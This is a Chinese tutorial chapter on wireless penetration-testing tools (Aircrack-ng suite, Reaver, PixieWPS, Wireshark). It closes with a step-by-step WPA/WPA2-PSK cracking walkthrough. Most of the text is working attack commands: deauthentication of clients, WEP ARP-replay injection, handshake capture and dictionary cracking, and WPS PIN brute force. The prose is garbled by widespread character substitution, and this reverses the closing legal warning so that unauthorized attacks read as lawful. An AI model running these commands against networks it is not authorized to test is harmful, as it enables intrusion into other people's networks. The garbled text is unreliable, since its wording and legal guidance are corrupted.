在本章节中,咱们将学习一些罕用的无线网络浸透测试工具,如Aircrack-ng、Reaver等。咱们将尽量解说得具体、通俗易懂,并提供尽可能多的实例。
6.1 Aircrack-ng套件
Aircrack-ng是一个用于测试无线网络安全的工具集,包含捕捉数据包、破解WEP和WPA/WPA2-PSK密钥、创立和治理拜访点等性能。以下是Aircrack-ng套件中的一些次要工具:
6.1.1 airmon-ng
airmon-ng用于治理无线网卡的监督模式。监督模式容许无线网卡捕捉所有左近的无线流量,而不仅仅是与其连贯的网络。
启用监督模式:
airmon-ng start wlan0
此命令将启用名为wlan0的无线网卡的监督模式,并创立一个名为wlan0mon的新接口。
6.1.2 airodump-ng
airodump-ng用于捕捉无线网络的数据包,包含SSID、BSSID、信道、加密类型等信息。
扫描左近的无线网络:
airodump-ng wlan0mon
此命令将应用名为wlan0mon的监督接口扫描左近的无线网络,并显示SSID、BSSID、信道、加密类型等信息。
捕捉指标网络的数据包:
airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon
此命令将捕捉指定信道和BSSID的指标网络的数据包,并将其保留到output_file中。
6.1.3 aireplay-ng
aireplay-ng用于发送数据包以生成流量,有助于放慢破解WEP和WPA/WPA2-PSK密钥的过程。
执行WEP攻打:
aireplay-ng -3 -b [BSSID] wlan0mon
此命令将对指定BSSID的指标网络执行ARP申请重注入攻打,以生成足够的数据包进行WEP破解。
执行WPA/WPA2-PSK攻打:
aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon
此命令将对指定BSSID的指标网络发送解除认证数据包,迫使客户端从新认证并捕捉握手数据包。
6.1.4 aircrack-ng
aircrack-ng用于破解WEP和WPA/WPA2-PSK密钥。
破解WEP密钥:
aircrack-ng [output_file]-01.cap
此命令将尝试破解捕捉到的WEP数据包,以获取WEP密钥。
破解WPA/WPA2-PSK密钥:
aircrack-ng -w [wordlist] [output_file]-01.cap
此命令将应用字典文件wordlist尝试破解捕捉到的WPA/WPA2-PSK握手数据包,以获取WPA/WPA2-PSK密钥。
6.2 Reaver
Reaver是一个用于破解WPS PIN码的工具,进而获取WPA/WPA2-PSK密钥。Reaver利用WPS设计的破绽,通过暴力破解PIN码来实现攻打。
应用Reaver破解WPS PIN码:
reaver -i wlan0mon -b [BSSID] -vv
此命令将应用名为wlan0mon的监督接口,针对指定BSSID的指标网络,尝试破解WPS PIN码。
6.3 PixieWPS
PixieWPS是一个用于利用WPS破绽的工具,能够与Reaver一起应用,使WPS攻打更加高效。
应用Reaver和PixieWPS进行WPS攻打:
reaver -i wlan0mon -b [BSSID] -c [channel] -K 1 -vv
此命令将应用名为wlan0mon的监督接口,针对指定信道和BSSID的指标网络,尝试破解WPS PIN码,并应用PixieWPS进行高效攻打。
6.4 Wireshark
Wireshark是一个功能强大的网络协议分析器,能够用于捕捉和剖析数据包,包含无线数据包。
应用Wireshark捕捉无线数据包:
- 关上Wireshark。
- 抉择名为wlan0mon的监督接口。
- 开始捕捉数据包。
6.5 实战案例
以下是一个应用Aircrack-ng套件执行WPA/WPA2-PSK攻打的实战案例:
- 启用监督模式:
airmon-ng start wlan0
- 扫描左近的无线网络:
airodump-ng wlan0mon
找到指标网络的BSSID和信道,例如BSSID为12:34:56:78:9A:BC
,信道为6。
- 捕捉指标网络的数据包:
airodump-ng -c 6 --bssid 12:34:56:78:9A:BC -w output wlan0mon
- 发送解除认证数据包以捕捉握手数据包:
aireplay-ng -0 1 -a 12:34:56:78:9A:BC -c 01:23:45:67:89:AB wlan0mon
其中,01:23:45:67:89:AB
是指标网络客户端的MAC地址。
- 应用字典文件破解握手数据包:
aircrack-ng -w wordlist.txt output-01.cap
如果破解胜利,将显示WPA/WPA2-PSK密钥。
请留神,无线网络浸透测试应该在非法范畴内进行。在没有受权的状况下攻打别人的无线网络是守法的。在学习和实际过程中,请确保本人恪守当地法律法规,免得触犯法律。
总结:在本章节中,咱们具体介绍了无线网络浸透测试工具,如Aircrack-ng、Reaver等,并提供了实例来帮忙你更好地了解这些工具的应用办法。心愿这些内容对你有所帮忙,让你可能把握无线网络浸透测试的基本技能。
举荐浏览:
https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA
https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g